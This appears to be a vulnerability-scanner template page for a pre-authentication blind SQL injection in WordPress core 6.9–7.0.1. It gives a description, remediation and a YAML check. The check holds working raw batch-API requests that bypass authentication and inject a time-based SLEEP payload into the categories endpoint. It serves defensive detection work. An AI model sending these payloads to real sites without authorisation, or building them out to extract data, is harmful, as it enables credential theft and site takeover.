WordPress Core 6.9-7.0.1 - Pre-Auth Blind SQL Injection (Batch-Route Confusion)
CVE-2026-63030
Early Release
Description
WordPress core versions 6.9.0 through 6.9.4 and 7.0.0 through 7.0.1 are vulnerable to a pre-authentication timing-based blind SQL injection via the REST API batch endpoint. A route confusion vulnerability (CVE-2026-63030) allows nested batch requests to bypass authentication checks, while a SQL injection flaw (CVE-2026-60137) in the author_exclude parameter of /wp/v2/categories allows arbitrary SQL queries via a SLEEP-based timing oracle. An unauthenticated attacker can extract the full database contents including user credentials.
Severity
Critical
CVSS Score
9.8
Affected Product
wordpress
Published Date
July 18, 2026
Template Author
slcyber, mielverkerken, pdteam
CVE-2026-63030.yaml
id: CVE-2026-63030
info:
name: WordPress Core 6.9-7.0.1 - Pre-Auth Blind SQL Injection (Batch-Route Confusion)
author: slcyber,mielverkerken,pdteam
severity: critical
description: |
WordPress core versions 6.9.0 through 6.9.4 and 7.0.0 through 7.0.1 are vulnerable to a pre-authentication timing-based blind SQL injection via the REST API batch endpoint. A route confusion vulnerability (CVE-2026-63030) allows nested batch requests to bypass authentication checks, while a SQL injection flaw (CVE-2026-60137) in the author_exclude parameter of /wp/v2/categories allows arbitrary SQL queries via a SLEEP-based timing oracle. An unauthenticated attacker can extract the full database contents including user credentials.
impact: |
An unauthenticated attacker can read the entire WordPress database contents including user credentials (password hashes), posts, configuration, and any stored secrets. This enables full site compromise through credential extraction and offline password cracking. The original research demonstrated extracting admin password hashes and is working toward full remote code execution.
remediation: |
Update WordPress immediately to version 6.9.5 or 7.0.2. As a temporary mitigation, block POST requests to /?rest_route=/batch/v1 at the WAF or reverse proxy level.
reference:
- https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-ff9f-jf42-662q
- https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-fpp7-x2x2-2mjf
- https://slcyber.io/research-center/wp2shell-pre-authentication-rce-in-wordpress-core
- https://www.aikido.dev/blog/unauthenticated-rce-in-wordpress-wp2shell
- https://wordpress.org/news/2026/07/wordpress-7-0-2-release/
- https://github.com/sergiointel/wp2shell-poc/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2026-63030,CVE-2026-60137
cwe-id: CWE-89,CWE-287
metadata:
verified: true
max-request: 3
vendor: wordpress
product: wordpress
framework: wordpress
shodan-query: http.component:"wordpress"
fofa-query: app="WordPress"
tags: cve,cve2026,wordpress,wp-core,sqli,time-based-sqli,preauth,batch-api,blind-sqli,vkev
flow: http(1) && http(2) && http(3)
http:
# Step 1: Confirm the target is a WordPress site
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- 'contains(body, "wp-content") || contains(body, "wp-includes") || contains(tolower(header), "rest_route")'
internal: true
# Step 2: FALSE condition — SLEEP should NOT trigger, response must be fast
- raw:
- |
POST /?rest_route=/batch/v1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"requests":[{"method":"POST","path":"http://:"},{"method":"POST","path":"/wp/v2/posts","body":{"requests":[{"method":"GET","path":"http://:"},{"method":"GET","path":"/wp/v2/categories?author_exclude=SELECT+IF%28%281%3D0%29%2CSLEEP%287%29%2C0%29"},{"method":"GET","path":"/wp/v2/posts"}]}},{"method":"POST","path":"/batch/v1"}]}
matchers-condition: and
matchers:
- type: status
status:
- 207
internal: true
- type: word
part: body
words:
- "parse_path_failed"
internal: true
# Step 3: TRUE condition — SLEEP(7) must trigger, confirming SQL injection execution
- raw:
- |
@timeout: 20s
POST /?rest_route=/batch/v1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"requests":[{"method":"POST","path":"http://:"},{"method":"POST","path":"/wp/v2/posts","body":{"requests":[{"method":"GET","path":"http://:"},{"method":"GET","path":"/wp/v2/categories?author_exclude=SELECT+IF%28%281%3D1%29%2CSLEEP%287%29%2C0%29"},{"method":"GET","path":"/wp/v2/posts"}]}},{"method":"POST","path":"/batch/v1"}]}
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'duration>=7'
- type: word
part: content_type
words:
- "application/json"
- type: status
status:
- 207
# digest: 490a00463044022051ceff5cfeccf59bb95d7fc75bdf8154dc99041284f15cee73cb29cbb2920ce402205ae06c9030f8de17a8007aa9de6e03cf36e006c3dd4ef6268dfb22e0a7ab193d:922c64590222798bb761d5b6d8e729509.8Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2026-63030cve-2026-60137
CWE ID:
cwe-89, cwe-287
References
https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-ff9f-jf42-662qhttps://github.com/WordPress/wordpress-develop/security/advisories/GHSA-fpp7-x2x2-2mjfhttps://slcyber.io/research-center/wp2shell-pre-authentication-rce-in-wordpress-corehttps://www.aikido.dev/blog/unauthenticated-rce-in-wordpress-wp2shellhttps://wordpress.org/news/2026/07/wordpress-7-0-2-release/https://github.com/sergiointel/wp2shell-poc/
Remediation Steps
Update WordPress immediately to version 6.9.5 or 7.0.2. As a temporary mitigation, block POST requests to /?rest_route=/batch/v1 at the WAF or reverse proxy level.